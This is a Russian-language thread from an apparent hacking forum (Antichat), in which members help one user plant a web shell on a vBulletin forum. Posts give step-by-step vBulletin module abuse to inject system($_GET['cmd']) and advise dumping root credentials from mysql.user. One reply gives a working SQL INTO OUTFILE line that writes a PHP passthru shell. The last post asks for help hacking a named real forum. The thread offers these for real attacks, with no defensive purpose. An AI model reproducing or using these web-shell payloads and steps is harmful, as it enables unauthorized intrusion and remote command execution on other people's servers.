HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 21.12.2007, 14:50
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию

-rw-r--r--. да такие права но они выделины белым а не зееленым редактировать файлы нельзя
 
Ответить с цитированием

  #22  
Старый 21.12.2007, 14:53
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами: 10077446

Репутация: 1020


По умолчанию

Твой кролик пишет - произнеси на англиском 1000 раз, тогда появится возможность и записи и чтения.
 
Ответить с цитированием

  #23  
Старый 21.12.2007, 14:57
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию

флуд тут не нужен
 
Ответить с цитированием

  #24  
Старый 21.12.2007, 14:57
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

если у тебя есть доступ к бд пробуй залить файл через into outfile, если не получится, попробуй извлечь логин и пасс рута из mysql.user, разшифруешь, подключишься к бд и снова попробуешь через into outfile
 
Ответить с цитированием

  #25  
Старый 21.12.2007, 15:00
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию

пробовал залить шел так
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

но ни чего не выходит смаилы тоже отдыхают у кого есть еще предложения
 
Ответить с цитированием

  #26  
Старый 21.12.2007, 15:05
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию

Цитата:
Сообщение от Spyder  
если у тебя есть доступ к бд пробуй залить файл через into outfile, если не получится, попробуй извлечь логин и пасс рута из mysql.user, разшифруешь, подключишься к бд и снова попробуешь через into outfile
хоть кто то понял о чем я говорю какой запрос в базе надо выполнить что бы залить шел
 
Ответить с цитированием

  #27  
Старый 22.12.2007, 02:28
Тр⚡️ха
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 178
С нами: 9731846

Репутация: 622
По умолчанию

select '<?php @passthru($_GET[cmd]); ?>' into outfile '/fullpatch/shell.php' from table
директория должна быть открыта на запись [-rwxrwxrwx]
from table иногда нужно иногда нет, table любая таблица

google на что, об этом не раз писали и видео много
 
Ответить с цитированием

  #28  
Старый 03.01.2008, 16:59
Airbender
Новичок
Регистрация: 02.01.2008
Сообщений: 1
С нами: 9660933

Репутация: 0
По умолчанию

народ помгаите взломать форум http://www.avatar-forums.com/ мне срочно нужно его ломануть или хотяб посмотрите может найдёте какие дыры
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.